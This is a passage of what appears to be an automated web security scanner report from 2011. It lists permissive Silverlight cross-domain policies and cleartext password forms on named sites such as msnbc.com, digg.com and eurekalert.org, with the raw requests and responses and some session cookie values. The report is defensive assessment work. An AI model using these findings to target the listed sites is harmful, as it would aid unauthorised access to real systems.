ETag: "0f4c23b55d4c81:17d2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.6. http://latino.aol.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://latino.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: latino.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://latino.video.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://latino.video.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: latino.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT
Accept-Ranges: bytes
ETag: "0f4c23b55d4c81:17d2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://netscape.aol.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://netscape.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: netscape.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.9. http://ninemsn.video.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ninemsn.video.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ninemsn.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT
Accept-Ranges: bytes
ETag: "0f4c23b55d4c81:17d2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:21 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.10. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 29 Jan 2011 05:52:40 GMT
Expires: Sun, 30 Jan 2011 05:52:40 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 73554

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.11. http://wrapper.g.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wrapper.g.redacted
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wrapper.g.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 29 Sep 2009 20:48:24 GMT
Accept-Ranges: bytes
ETag: "1d441304641ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.12. http://www.ticketcity.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ticketcity.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.ticketcity.com

Response

HTTP/1.1 200 OK
Content-Length: 339
Content-Type: text/xml
Last-Modified: Thu, 22 Jul 2010 14:19:57 GMT
Accept-Ranges: bytes
ETag: "a58098f6a829cb1:1713"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:03:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.13. http://blstj.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://blstj.redacted
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: blstj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Mon, 22 Jun 2009 18:26:44 GMT
Accept-Ranges: bytes
ETag: "08a92fe66f3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
S: BLUMPPSTCA03
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:41:05 GMT
Content-Length: 400
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*.redacted" />
<domain uri="http://*.msn-int.com" />
...[SNIP]...

7.14. http://dateline.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dateline.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dateline.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:03 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.15. http://explore.live.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://explore.live.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: explore.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 08 Dec 2010 19:39:30 GMT
Accept-Ranges: bytes
ETag: "c13adea1f97cb1:0"
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:16 GMT
Connection: close
Content-Length: 492

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">

<domain uri="http://windows.microsoft.com"/><domain uri="http://*.windows.microsoft.com"/>
...[SNIP]...
<domain uri="http://*.explore.live.com"/>
...[SNIP]...

7.16. http://hardball.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://hardball.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hardball.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:22 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.17. http://msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.18. http://msnbcmedia.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msnbcmedia.redacted
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msnbcmedia.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "8066f4feb3aecb1:243"
Last-Modified: Fri, 07 Jan 2011 21:44:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:31 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.19. http://mtp.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mtp.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mtp.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:52 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.20. http://nbcsports.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nbcsports.msnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:25b"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 533
Cache-Control: public, max-age=60
Expires: Sun, 30 Jan 2011 02:18:06 GMT
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.21. http://nightly.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nightly.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nightly.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:18 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.22. http://rachel.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rachel.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rachel.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:13 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.23. http://today.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://today.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: today.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:56:39 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.24. http://tv.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://tv.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: tv.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:01:30 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.25. http://www.msnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.msnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:07:03 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.26. http://services.money.redacted/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.money.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: services.money.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 23:35:24 GMT
Accept-Ranges: bytes
ETag: "04698de7abecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:34:35 GMT
Connection: close
Content-Length: 649

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://appsrv.sandblu.msn-int.com"/>
<domain uri="http://colstc.redacted"/>
<domain uri="http://colstj.redacted"/>
<domain uri="http://blstj.redacted"/>
<domain uri="http://blstc.redacted"/>
...[SNIP]...

8. Cleartext submission of password previous next
There are 13 instances of this issue:

http://digg.com/search
http://eurekalert.org/
http://msn.chemistry.com/cp/landing/44762
http://msn.chemistry.com/cp/landing/57269
http://spacefellowship.com/
http://www.dailygrail.com/
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.polls.newsvine.com/_vine/js/m1/vine.js
http://www.scientificamerican.com/blog/observations/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.unmannedspaceflight.com/
http://www.zacks.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://digg.com/search previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/search

The form contains the following password field:

password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.2. http://eurekalert.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://eurekalert.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.eurekalert.org/login.php

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: eurekalert.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
X-Powered-By: PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 64809

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org /TR/REC-html40/loose.dtd">
<html>
<head>
<title>EurekAlert! - Science News</title>
<meta http-equiv=content-type c
...[SNIP]...
</tr>
<form action="http://www.eurekalert.org/login.php" name="login" method="POST">
<tr>
...[SNIP]...
<img src="http://www.eurekalert.org/images/shared/spacer.gif" width="12" height="6" alt="" /><input type="PASSWORD" name="password" size="15" class="IB_InputMedium" maxlength="31" onChange="document.login.click()"></td>
...[SNIP]...

8.3. http://msn.chemistry.com/cp/landing/44762 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/44762

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://msn.chemistry.com/cp/landing/44762

The form contains the following password field:

password

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.4. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://msn.chemistry.com/cp/landing/57269

The form contains the following password field:

password

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.5. http://spacefellowship.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spacefellowship.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://spacefellowship.com/login?redirect=%2F

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: spacefellowship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache
Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly
Connection: close
Content-Type: text/html; charset: utf-8
Content-Length: 92137

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
<div id="plWindow">
   <form id="frmlogin" name="frmlogin" method="post" action="/login?redirect=%2F">
       <div id="plClose">
...[SNIP]...
<input class="DefaultInput" id="plInputUsr" name="username" value="" type="text" />
               <input class="DefaultInput" id="plInputPass" name="password" value="" type="password" />
               <div id="plAutoLogin">
...[SNIP]...

8.6. http://www.dailygrail.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.dailygrail.com/content/Daily-Grail-Frontpage?destination=node%2F7931

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
<div class="content">
<form action="/content/Daily-Grail-Frontpage?destination=node%2F7931" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

8.7. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

The form contains the following password field:

login_password

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.8. http://www.polls.newsvine.com/_vine/js/m1/vine.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/js/m1/vine.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.polls.newsvine.com/_vine/js/m1/vine.js?v=23247

The form contains the following password field:

password

Request

GET /_vine/js/m1/vine.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://polls.newsvine.com/
Accept: */*
